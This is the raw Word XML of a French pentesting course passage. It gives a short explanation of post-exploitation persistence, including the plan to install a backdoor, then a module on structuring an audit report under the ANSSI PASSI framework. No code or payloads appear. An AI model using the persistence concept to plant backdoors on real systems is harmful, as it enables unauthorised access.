    <w:p w14:paraId="4A0DD057" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="0EFE76F8" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">La persistance est la création d’autres moyens de retrouver l’accès à un hôte sans repasser par la phase d’exploitation pour les raisons suivantes : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5326C802" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="11D3CC3F" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Certaines exploits instables</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> peuvent tuer le processus vulnérables pendant l’exploitation </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054F465C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Gagner un premier accès au réseau interne de l'extérieur est difficile à reproduire </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4AF71C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Toute vulnérabilité utilisée pour obtenir votre premier accès peut être corrigée si vos actions sont </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>détectées..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4FF6D625" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">donc on </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>vas</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> installer une nouvelle porte dérobée (backdoor) sécurisé</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8235A3" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="5D509324" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="7729BF9D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="127" w:name="_m4bx33229bi9" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="127"/>
    </w:p>
    <w:p w14:paraId="17A8EDB0" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="46B331F5" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="128" w:name="_6k5yv3b7wyn4" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="128"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0B5394"/>
        </w:rPr>
        <w:t xml:space="preserve">Module 15 - Rédaction du rapport </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6390669C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="35BD4A03" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Document de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t>référence</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> référentiel d’exigences applicable aux prestataires d’audit de la sécurité des systèmes d’information (PASSI) version 2.1 du 6 octobre 2015 - Partie 6 étape 5 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CD18AD" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="0C38788C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Doc </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId82">
        <w:r w:rsidR="00223B72">
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Prestataires d'audit de la sécurité des systèmes d'information Référentiel d'exigences</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6D754236" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="129" w:name="_xas8qyflcvwt" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="129"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t xml:space="preserve">Le rapport comprendra 3 parties indispensable : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467A0A07" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="52DF847C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">La synthèse managériale (contexte et </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>périmètre;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> vulnérabilités les plus importantes et leurs mesures correctives; appréciation du niveau de sécurité général). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EA6FFF" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33D77981" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Les résultats de l’audit (vulnérabilités relevées et mesures correctives proposées, classées par criticité, complexité, ou coût estimé de correction). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5D2AF8" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D465584" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Le déroulé des tests (chronologie et méthodologies employées).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4B98AC" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="130" w:name="_rabi28s4fkfm" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="130"/>
    </w:p>
    <w:p w14:paraId="552CD1A7" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="131" w:name="_t5jouh8e1wab" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="131"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t>Partie 1 - La synthèse Managériale</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3373E556" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="0031DCC7" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Cette synthèse doit être relativement courte (une à deux pages) et doit être compréhensible par des populations non expertes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EF6B2E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="62EF6F9E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">L’objectif de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>cette parties</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> est que toute personne ayant accès au rapport comprenne en quelques minutes quelles sont les principales : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1699F98B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="2C06F9D4" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="134F5C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22AAF390" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="134F5C"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnérabilités </w:t>
      </w:r>
      <w:r>
        <w:t>qui impactent l’application auditée</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134EA1F9" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Mettre l’accent sur ce que permettent de faire ces vulnérabilités plutôt que sur la vulnérabilité en elle-même minutes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA88BF2" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F0DAF7C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="134F5C"/>
        </w:rPr>
        <w:t>Action pour y remédier</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ce ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> quel que soit son </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>coeur</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de métier </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B120975" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="4E018613" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="2B816610" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="109"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="132" w:name="_hjv6o29r7b2b" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="132"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t>Partie 2 - Le résultat des tests d’intrusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E354184" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="7C1F264A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cette partie du rapport d’audit s’adresse aux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>populations techniques</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, notamment les personnes qui vont être chargées de mettre en œuvre les recommandations et </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>( éventuellement</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ) vérifier la bonne application de la correction en testant de nouveau l’application. Cette partie va servir à construire le plan d’action.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520CCDB5" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="503C7717" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="3AB17B22" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Elle contient deux-sous-parties </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CD8FA8" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Les vulnérabilités</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, avec : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0D04BB" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>le nom ou l’intitulé que vous aurez donné à la vulnérabilité</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607B7EEE" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">le détail de la vulnérabilité, suffisamment exhaustif pour localiser rapidement la vulnérabilité sur </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>l’application;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7CC15A2E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>la criticité de la vulnérabilité, par exemple selon son score CVSS ou selon l’échelle définie dans le référentiel PASSI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20ADA23B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40356D4D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="5CAF01D5" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="40E62092" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Les recommandations</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>avec;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="577C52DC" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">le nom ou l’intitulé que vous aurez donné à la </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>recommandation;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5783A93F" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">                  b. le détail de la recommandation, ce qui est attendu des équipes et un exemple ou un lien vers un article ou des ressources aidant à implémenter la recommandation dans le cas des recommandations </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>techniques;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7100C23B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       c. L’importance de la recommandation dans le plan d’action global</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4528444C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       d. le coût relatif ou la complexité relative que vous estimez pour la mise en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>oeuvre</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de la </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>correction;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="34D102FC" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">                   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>e .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> la référence de la ou des vulnérabilité(s) qu'elle corrige ou mitigé</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516C3C30" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="404DD195" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="164"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="133" w:name="_mpm7gd4on199" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="133"/>
      <w:r>
        <w:rPr>
          <w:color w:val="3D85C6"/>
        </w:rPr>
        <w:t>Partie 3 - Le déroulé des tests d’intrusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046E1A4C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EF38EEF" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cette partie est généralement la plus conséquente du rapport. Elle détaille et explicite tous les tests qui ont été effectués sur la cible, qu’ils aient mené à la découverte d’une vulnérabilité, ou au contraire amené la preuve de l’absence de vulnérabilité. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BF1894" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="2E1EB09F" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Quel que soit le niveau de détail retenu, l’approche peut </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>être</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6A6A88D8" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>linéaire et chronologique</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> comme le suggère l’ANSSI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1410B272" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ou </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>compartimentée en grandes sections</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> selon </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>les typo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de vulnérabilités (comme nous l’avons vu dans ce cours). Le web s’y prête assez bien à la différence d’autres types de tests d'intrusion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9A6913" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="41BDD771" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’idée de cette section est de raconter l’histoire de votre test </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>d(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">intrusion , ce que vous avez essayé, pourquoi, et quel en a été le résultat. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFEE637" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="0FD28F7E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="1BD7A181" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Dans cette partie du rapport, vous </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>mettez:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5B8557" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="64172C47" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="157"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Toutes les preuves de travail (les vulnérabilités, les </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payloads</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - voir les outils ! - utilisés)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680A792E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="157"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Mais également les preuves de protection ou l’absence de vulnérabilités</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D7CE4C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16122BBA" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Si un pentester repasse sur l'app quelques mois voire quelques années après vous, il doit être en mesure de comprendre exactement ce que vous avez fait et ce que vous avez trouvé à partir de votre rapport. A aucun moment, il ne doit pouvoir se dire “Mais qu’est-ce qu’il </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>à</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> fait ici ? “ ou encore “Mais comment est-il arrivé à ce résultat ? “</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52244A9F" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="554F9D9D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Pour chaque test, je structure mon approche comme </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ceci;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5E606E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Une explication de ce que je cherche pourquoi, je le cherche et comment ça </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>fonctionne;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="41A65858" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le test de la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vulné</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>question;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2597EF87" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>L’interprétation du résultat des tests, positif ou négatif</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CCD36D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="5CD7DE14" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
